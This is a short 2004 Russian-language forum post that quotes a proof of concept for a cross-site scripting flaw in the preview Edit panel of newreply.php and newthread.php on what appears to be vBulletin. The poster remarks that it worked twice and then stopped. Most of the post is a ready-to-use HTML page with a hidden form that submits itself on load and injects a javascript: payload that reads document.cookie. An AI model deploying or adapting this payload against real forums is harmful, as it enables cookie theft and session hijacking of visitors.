03.12.2004, 15:27
|
|
Новичок
Регистрация: 02.12.2004
Сообщений: 8
Провел на форуме:
0
Репутация:
0
|
|
Ага.. вот это у меня два раза сработало... потом перестало..
Proof of concept:
While a user is previewing the post , both newreply.php and newthread.php
do sanitize the input in 'Preview',but not Edit-panel,malicious code can be
injected thru this flaw.
Exploit:
A page as below can lead visitor to a Preview page which contains XSS code.
-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)"& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>
-----------------------------End-----------------------------
|
|
|